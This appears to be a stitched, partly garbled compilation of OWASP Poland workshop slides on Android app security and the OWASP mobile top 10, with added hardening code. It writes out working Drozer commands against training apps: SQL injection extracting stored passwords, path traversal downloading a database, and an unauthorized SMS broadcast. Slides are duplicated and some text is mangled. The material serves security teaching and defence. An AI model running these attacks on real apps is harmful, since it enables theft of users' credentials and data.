Intent j = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections: dz> run scanner.provider.injection -a <package_name>
• Data path traversal: dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
dz> run app.package.manifest -a <package_name>
dz> run app.activity.info -a <package_name>
dz> run app.service.info --permission null -a <package_name>
dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" prefix allows the remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using Intent-filters. Even if the Activity has the attribute exported="false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
• Simple definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and verify if:
– a session expires (copy a cookie and try to use it after 30 minutes)
– a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
– you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – a few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should they REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
– http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate the session on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
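The four mitigations above in one server-side component, as an added example (not from the workshop): a session store that issues high-entropy tokens, expires idle sessions after a per-app timeout, rotates the token when the authentication state changes and invalidates everything else the user had. The timeout value and the injected clock are assumptions made so the expiry path can be exercised without waiting.

```python
"""Added example (not from the workshop): a server-side session store along the
lines of the M9 mitigations. Tokens come from the OS CSPRNG, the store keeps only
their SHA-256 so a leaked table does not hand out live sessions, idle sessions
expire, and a change of authentication state rotates the token."""
import hashlib
import secrets
import time


class SessionStore:
    def __init__(self, idle_timeout_s=30 * 60, clock=time.time):
        # idle_timeout_s is the value to tune per application; 30 minutes is
        # only a placeholder. clock is injectable for testing.
        self.idle_timeout_s = idle_timeout_s
        self.clock = clock
        self._sessions = {}  # sha256(token) -> {"user": str, "last_seen": float}

    @staticmethod
    def _key(token):
        return hashlib.sha256(token.encode("utf-8")).hexdigest()

    def create(self, user):
        """Issue a fresh 256-bit token; never derive it from the device ID or any
        other value another app or user could know."""
        token = secrets.token_urlsafe(32)
        self._sessions[self._key(token)] = {"user": user, "last_seen": self.clock()}
        return token

    def lookup(self, token):
        """Return the user bound to a live token, refreshing its idle timer, or
        None. An expired token is deleted on sight, not merely refused."""
        key = self._key(token)
        session = self._sessions.get(key)
        if session is None:
            return None
        now = self.clock()
        if now - session["last_seen"] > self.idle_timeout_s:
            del self._sessions[key]
            return None
        session["last_seen"] = now
        return session["user"]

    def invalidate(self, token):
        """Server-side logout: the token stops working even if the client keeps it."""
        return self._sessions.pop(self._key(token), None) is not None

    def rotate(self, token, new_user=None):
        """Call whenever the authentication state changes (login, privilege
        change, switching to another user): the presented token dies, every
        other session of the previous user dies, and a new token is issued."""
        old = self._sessions.pop(self._key(token), None)
        if old is None:
            raise KeyError("unknown or expired session")
        self._sessions = {k: v for k, v in self._sessions.items()
                          if v["user"] != old["user"]}
        return self.create(new_user or old["user"])

    def purge_expired(self):
        """Destroy unused tokens in bulk; returns how many were removed."""
        now = self.clock()
        dead = [k for k, v in self._sessions.items()
                if now - v["last_seen"] > self.idle_timeout_s]
        for k in dead:
            del self._sessions[k]
        return len(dead)

    def __len__(self):
        return len(self._sessions)
```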
Thank you
pawelrzepaoutlookcom
Reverse Engineering amp Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone
– APKOptic
– Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling
– High level – Java code
• Disassembling
– Low level – assembly code
• Why disassembling and not decompiling?
Decompiling
(Diagram: DEX → JAR → Java)
Decompiling - Dex2Jar
• dex2jar
– Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
– Allows using any existing Java decompiler with the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
– Closed source Java decompiler
– Combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
(Diagram: DEX → Smali)
Disassembling
• Apktool
– Open source Java tool for reverse-engineering Android apps
– Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar: java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
bull Using AppUse
Demo Time
Demo: Decompiling with Luyten
Demo: Modifying Smali files
Demo
Google Play
1. Require and validate developer information
2. Review applications before distribution
3. Permanently stop distribution
4. Reduce attacker flexibility
5. Remove applications after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps
The vast majority of installs come from Google Play
Verify Apps
Apps are verified prior to install
Warn for or block Potentially Harmful Applications
Over 10 million installs verified every day
Verifying is on and visible when needed
Core security features to build secure applicaton
bull The Android Application Sandboxbull An application framework with robust implementations of common
security functionality such as cryptography permissionsbull An encrypted file system that can be enabled to protect data on lost
or stolen devicesbull User-granted permissions to restrict access to system features and
user databull Application-defined permissions to control application data on a
per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
• Unrestricted access to app database
dz> run scanner.provider.finduris -a com.mwr.example.sieve
Accessible content URIs:
  content://com.mwr.example.sieve.DBContentProvider/Keys/
  content://com.mwr.example.sieve.DBContentProvider/Passwords
  content://com.mwr.example.sieve.DBContentProvider/Passwords/
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --vertical
• SQL injection
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --projection "* FROM Key--"
| Password         | pin  |
| thisismypassword | 9876 |
• Path traversal
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
Written 24576 bytes
Content providers demo
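A provider hardened against the three attacks walked through above (unrestricted query, injection through selection/projection, path traversal in openFile), written here as an added example; it is not the sieve app's or the workshop's code, and the package name, table layout and VaultDbHelper class are assumptions:

```java
package com.example.vault;

import android.content.ContentProvider;
import android.content.ContentValues;
import android.content.Context;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteOpenHelper;
import android.database.sqlite.SQLiteQueryBuilder;
import android.net.Uri;
import android.os.ParcelFileDescriptor;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.util.HashMap;
import java.util.Map;

/*
 * Manifest side (assumed). The provider is not exported and is additionally guarded by
 * an app-defined signature permission, so "run app.provider.info --permission null"
 * would not list it:
 *
 *   <permission android:name="com.example.vault.ACCESS_VAULT"
 *               android:protectionLevel="signature" />
 *   <provider android:name=".VaultProvider"
 *             android:authorities="com.example.vault.provider"
 *             android:exported="false"
 *             android:permission="com.example.vault.ACCESS_VAULT" />
 */
public class VaultProvider extends ContentProvider {
    private static final String TABLE_PASSWORDS = "Passwords";
    // Allow-list of columns a caller may ask for. The "password" column is deliberately
    // absent, so it can never be selected through IPC at all.
    private static final Map<String, String> PROJECTION_MAP = new HashMap<>();
    static {
        PROJECTION_MAP.put("_id", "_id");
        PROJECTION_MAP.put("service", "service");
        PROJECTION_MAP.put("username", "username");
    }

    // Minimal SQLiteOpenHelper for the example's single table (assumed schema).
    private static final class VaultDbHelper extends SQLiteOpenHelper {
        VaultDbHelper(Context ctx) { super(ctx, "vault.db", null, 1); }
        @Override public void onCreate(SQLiteDatabase db) {
            db.execSQL("CREATE TABLE Passwords (_id INTEGER PRIMARY KEY, service TEXT, "
                    + "username TEXT, password TEXT)");
        }
        @Override public void onUpgrade(SQLiteDatabase db, int oldV, int newV) { }
    }

    private SQLiteOpenHelper helper;

    @Override
    public boolean onCreate() {
        helper = new VaultDbHelper(getContext());
        return true;
    }

    @Override
    public Cursor query(Uri uri, String[] projection, String selection,
                        String[] selectionArgs, String sortOrder) {
        SQLiteQueryBuilder qb = new SQLiteQueryBuilder();
        qb.setTables(TABLE_PASSWORDS);
        // Strict mode makes the builder verify selection and sort clauses, and the
        // projection map rejects any column outside the allow-list, so a selection of "'"
        // or a projection of "* FROM Key--" is refused instead of pasted into the SQL.
        qb.setStrict(true);
        qb.setProjectionMap(PROJECTION_MAP);
        SQLiteDatabase db = helper.getReadableDatabase();
        // Values travel in selectionArgs (bound parameters), never in the SQL string.
        return qb.query(db, projection, selection, selectionArgs, null, null, sortOrder);
    }

    @Override
    public ParcelFileDescriptor openFile(Uri uri, String mode) throws FileNotFoundException {
        if (!"r".equals(mode)) {
            throw new FileNotFoundException("read-only provider");
        }
        File base = new File(getContext().getFilesDir(), "backups");
        // Resolve the requested path under the allowed directory, then check that the
        // canonical result is still inside it; this is what stops /etc/hosts and ../
        // sequences like the FileBackupProvider reads shown above.
        File requested = new File(base, uri.getPath());
        try {
            String basePath = base.getCanonicalPath() + File.separator;
            if (!requested.getCanonicalPath().startsWith(basePath)) {
                throw new FileNotFoundException("path outside backup directory");
            }
        } catch (IOException e) {
            throw new FileNotFoundException("cannot canonicalize path");
        }
        return ParcelFileDescriptor.open(requested, ParcelFileDescriptor.MODE_READ_ONLY);
    }

    // Mutating operations are not offered through IPC at all.
    @Override public Uri insert(Uri uri, ContentValues values) { throw new UnsupportedOperationException(); }
    @Override public int delete(Uri uri, String sel, String[] args) { throw new UnsupportedOperationException(); }
    @Override public int update(Uri uri, ContentValues v, String sel, String[] args) { throw new UnsupportedOperationException(); }
    @Override public String getType(Uri uri) { return "vnd.android.cursor.dir/vnd.example.vault"; }
}
```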
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low, boot completed, headset plug, etc. Though most of the broadcast receivers originate from the system, applications can also announce broadcasts.
• If a receiver accepts broadcasts from untrusted sources, the app is at risk
Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send intent and enjoy
Sample manifest from GoatDroid:
<receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
    <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
    </intent-filter>
</receiver>
…
<uses-permission android:name="android.permission.SEND_SMS" />
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action:
public void onReceive(Context arg0, Intent arg1) {
    context = arg0;
    SmsManager sms = SmsManager.getDefault();
    Bundle bundle = arg1.getExtras();
    // Both extras come straight from the incoming intent: no sender check, no validation
    sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
    Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
}
run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies to all above-mentioned items:
• Setting the android:exported attribute to false (only components running under the same user ID as the current app will be able to access the activity)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
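The two defenses on this slide applied to the GoatDroid receiver pattern shown earlier, as an added example rather than GoatDroid's own code; the org.example.fourgoats names are assumptions:

```java
package org.example.fourgoats.broadcastreceivers;

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.telephony.PhoneNumberUtils;
import android.telephony.SmsManager;

/*
 * Manifest side (assumed). android:exported="false" keeps every other UID out of the
 * receiver; the signature-level permission is a second lock in case the component is
 * ever exported to a companion app signed with the same key. The same two attributes
 * apply to services and providers.
 *
 *   <permission android:name="org.example.fourgoats.permission.SOCIAL_SMS"
 *               android:protectionLevel="signature" />
 *   <receiver android:name=".broadcastreceivers.SendSMSNowReceiver"
 *             android:exported="false"
 *             android:permission="org.example.fourgoats.permission.SOCIAL_SMS">
 *       <intent-filter>
 *           <action android:name="org.example.fourgoats.SOCIAL_SMS" />
 *       </intent-filter>
 *   </receiver>
 */
public class SendSMSNowReceiver extends BroadcastReceiver {
    public static final String ACTION_SOCIAL_SMS = "org.example.fourgoats.SOCIAL_SMS";
    public static final String EXTRA_PHONE = "phoneNumber";
    public static final String EXTRA_MESSAGE = "message";
    private static final int MAX_SMS_LENGTH = 160;

    @Override
    public void onReceive(Context context, Intent intent) {
        // The manifest already limits who can reach this method; the checks below make
        // the receiver fail closed on anything that is not the intent it expects.
        if (intent == null || !ACTION_SOCIAL_SMS.equals(intent.getAction())) {
            return;
        }
        String phone = intent.getStringExtra(EXTRA_PHONE);
        String message = intent.getStringExtra(EXTRA_MESSAGE);
        if (!isAcceptable(phone, message)) {
            return;   // drop silently; never toast caller-controlled text
        }
        SmsManager.getDefault().sendTextMessage(phone, null, message, null, null);
    }

    // Pure validation logic, kept separate so it can be tested on its own.
    static boolean isAcceptable(String phone, String message) {
        if (phone == null || message == null || message.isEmpty()) return false;
        if (message.length() > MAX_SMS_LENGTH) return false;
        // Reject anything that is not a dialable number (letters, URIs, control chars).
        return PhoneNumberUtils.isGlobalPhoneNumber(phone);
    }

    // The in-app sender uses an explicit Intent: no intent-filter matching, so no other
    // app's receiver declaring the same action can pick it up.
    public static void sendSocialSms(Context context, String phone, String message) {
        Intent intent = new Intent(context, SendSMSNowReceiver.class);
        intent.setAction(ACTION_SOCIAL_SMS);
        intent.putExtra(EXTRA_PHONE, phone);
        intent.putExtra(EXTRA_MESSAGE, message);
        context.sendBroadcast(intent);
    }
}
```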
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components/
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage/
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers/
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook/
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5
• https://manifestsecurity.com/android-application-security-part-8
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to provide you with basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in the data stores on the device in an insecure (plain text or reversible encoding) format
Insecure data storage – what to look for
• Look for any sensitive information in:
  – SQLite databases (local)
  – XML data stores
  – Plain text configuration files
  – Cookie stores
  – SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the sdcard before and after installing an application
• Analyze package files at different stages:
adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted and world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the setStorageEncryption method)
• For databases, consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or it does it incorrectly
What do you mean "incorrectly"?
• Insecure implementations are:
  – Using known weak cipher/protocol versions (e.g. SSLv2/SSLv3, RC4)
  – Securing only part of the communication (e.g. only authentication)
  – Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the side of the browser
• It is done by a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• Embedded in the source code: the expected X.509 certificate or public key
if (presented_cert == pinned_cert)
    Start_connection()
else
    Drop_connection()
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid: mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest/ for a public domain):
sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store:
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage is about the developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakages
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server side whenever possible
• Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…):
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the passwords to decrypt it in the code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device. Use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as an input and executed by the application (on the client side)
• The malicious code can come from:
  – Another application, via intent/content provider
  – Shared file
  – Server response
  – Third party website
Client side injection – what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android's toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. other application, system service, running a new activity, etc.) via special objects called Intents:
Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
dz> run app.package.manifest -a <package_name>
dz> run app.activity.info -a <package_name>
dz> run app.service.info --permission null -a <package_name>
dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" prefix allows remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using intent-filters. Even if the Activity has the attribute exported="false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
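The mitigations above applied to an Activity that other apps can hand a URI to, as an added example (not from the slides): allow-list validation of the incoming Intent, a locked-down WebView, and an explicit Intent for the in-app hand-off. The package, host names and DetailsActivity are assumptions.

```java
package org.example.viewer;

import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.WebSettings;
import android.webkit.WebView;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;

public class ContentViewerActivity extends Activity {
    // Only these hosts may be rendered; the scheme is pinned to https below.
    private static final Set<String> ALLOWED_HOSTS =
        new HashSet<>(Arrays.asList("content.example.com", "cdn.example.com"));

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Uri target = sanitizeIncomingUri(getIntent());
        if (target == null) {
            finish();   // fail closed: no UI built from caller-controlled data
            return;
        }
        WebView view = new WebView(this);
        WebSettings s = view.getSettings();
        s.setJavaScriptEnabled(false);    // static content, so no script surface at all
        s.setAllowFileAccess(false);      // no file:// reads through the WebView
        s.setAllowContentAccess(false);   // no content:// provider reads either
        setContentView(view);
        view.loadUrl(target.toString());
    }

    // Returns the URI only if it is https, has no userinfo, and its host is allow-listed.
    static Uri sanitizeIncomingUri(Intent intent) {
        if (intent == null || !Intent.ACTION_VIEW.equals(intent.getAction())) return null;
        Uri uri = intent.getData();
        if (uri == null) return null;
        String scheme = uri.getScheme();
        String host = uri.getHost();
        if (!"https".equalsIgnoreCase(scheme) || host == null) return null;
        if (!ALLOWED_HOSTS.contains(host.toLowerCase())) return null;
        if (uri.getUserInfo() != null) return null;   // rejects https://good.host@evil.host/ tricks
        return uri;
    }

    // Hand-off to the app's own next screen: explicit component, so no intent-filter in
    // another app can claim it and no chooser dialog is shown.
    void openDetails(Uri uri) {
        Intent next = new Intent(this, DetailsActivity.class);   // hypothetical in-app Activity
        next.setData(uri);
        startActivity(next);
    }
}
```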
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
  – Verify if a session expires (copy a cookie and try to use it after 30 minutes)
  – Verify if a session is destroyed after the authentication state changes (e.g. switching from any logged in user to another logged in user)
  – Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should it REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
- http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
